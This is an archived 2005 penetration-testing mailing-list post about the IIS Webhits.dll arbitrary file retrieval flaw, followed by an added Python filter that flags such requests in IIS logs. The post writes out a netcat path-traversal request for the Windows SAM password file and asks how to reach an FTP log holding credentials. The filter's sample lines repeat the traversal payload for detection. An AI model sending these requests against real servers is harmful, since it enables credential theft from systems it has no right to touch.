Penetration Testing mailing list archives
Webhits.dll arbitrary file retrieval Vulnerability
From: Maverick The Techie <seclists4maverick () gmail com>
Date: Thu, 3 Mar 2005 12:55:22 +0530
Respected Members, when I was doing a web server scan through Nikto on my website, it reported that the files "/scripts/samples/search/qfullhit.htw" & "/scripts/samples/search/qsumrhit.htw" are vulnerable to the "Webhits.dll arbitrary file retrieval Vulnerability". When I researched on Google, I found this bug's advisory by David Litchfield, and he says that "Even if you have no .htw files on your system you're probably still vulnerable! A quick test to show if you are vulnerable: go to http://YOUR_WEB_SERVER_ADDRESS_HERE/nosuchfile.htw If you receive a message stating the "format of the QUERY_STRING is invalid" you _are_ vulnerable." When I typed this URL into IE (www.acme.com/nosuchfile.htw) I got this response: "The format of QUERY_STRING is invalid." which proved that the web server was vulnerable to this vulnerability. So I tried to exploit it via netcat by reading the rest of the advisory, so I tried this in netcat:

E:\nc11nt>nc -v -n 202.xx.xx.208 80
(UNKNOWN) [202.xx.xx.208] 80 (?) open
GET /scripts/samples/search/qfullhit.htw?ciwebhitsfile=/../../winnt/repair/sam._&cirestriction=none&cihilitetype=full

HTTP/1.0 200 OK
Content-Type: text/html

<HTML>
<BODY>
<p><h3><center>The path specified is incorrect.<BR></center></h3><BR></BODY>
</HTML>

E:\nc11nt>

Though I could not retrieve the SAM file hashes, I still got an HTTP 200 OK message. Now Nikto also says that there is a "Ws_ftp.log" file on the server. Now I don't have any clue on this file and its location on the server; some admins say that it contains the FTP user id and encrypted password, which is way easy to crack!! Now, is there a way that I can access that log file through the above vulnerability, or any other files for that matter, because whatever files I have tried to access using the above way I have got nothing but HTTP OK messages.
I request you all to kindly explain the method to exploit this bug and access files, because I am unable to exploit this vulnerability in a proper way, so unless I know how this bug is exploited, I cannot patch it, because I want to know how to exploit it first before patching it so that I can know all the avenues a cracker can use to enter my web server. Any help would be certainly appreciated. -=Maverick_12210=-
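A detection-side addition that is not part of this post or of the thread's replies: a small Python filter that flags, in IIS-style request logs, the two patterns the message above describes (any request for a .htw name, which is the "nosuchfile.htw" quick test, and a ciwebhitsfile value that walks out of the web root with ".."). The W3C field order and the sample log lines are constructed assumptions, not real traffic.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample IIS W3C log lines (not real traffic). Assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status  ("-" = empty query)
SAMPLE_LOG = """\
2005-03-03 07:25:22 203.0.113.5 GET /scripts/samples/search/qfullhit.htw ciwebhitsfile=/../../winnt/repair/sam._&cirestriction=none&cihilitetype=full 200
2005-03-03 07:25:40 203.0.113.5 GET /nosuchfile.htw - 200
2005-03-03 07:26:01 198.51.100.9 GET /default.htm - 200
2005-03-03 07:26:15 203.0.113.5 GET /iisadmpwd/qsumrhit.htw ciwebhitsfile=%2F..%2F..%2Fwinnt%2Fwin.ini&cihilitetype=full 200
"""

# A ".." path segment, with either slash style, anywhere in the requested file name.
DOT_DOT = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def classify(line):
    """Return (client_ip, uri_stem, reason) for a suspicious request, else None."""
    parts = line.split()
    if len(parts) != 7:
        return None  # not in the assumed field layout; skip rather than guess
    _date, _time, ip, _method, stem, query, _status = parts
    if not stem.lower().endswith(".htw"):
        return None  # only .htw requests are handed to webhits.dll
    # Any .htw hit matches the advisory's quick test; a bad status code does not
    # clear it, since the post shows the server answering 200 to these requests.
    reason = "htw-probe"
    if query != "-":
        params = {k.lower(): v for k, v in parse_qs(query, keep_blank_values=True).items()}
        for value in params.get("ciwebhitsfile", []):
            # parse_qs already URL-decodes once; unquote again so a double-encoded
            # "%252F.." segment is also caught.
            if DOT_DOT.search(unquote(value)):
                reason = "webhits-traversal"  # file argument escapes the web root
    return ip, stem, reason


def scan(log_text):
    """Run classify over every line; returns the findings in log order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for ip, stem, reason in scan(SAMPLE_LOG):
        print(f"{reason:18} {ip:15} {stem}")
```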
Current thread:
- Webhits.dll arbitrary file retrieval Vulnerability Maverick The Techie (Mar 03)
- Re: Webhits.dll arbitrary file retrieval Vulnerability H D Moore (Mar 03)
- <Possible follow-ups>
- Re: Webhits.dll arbitrary file retrieval Vulnerability Jian Hui Wang (Mar 03)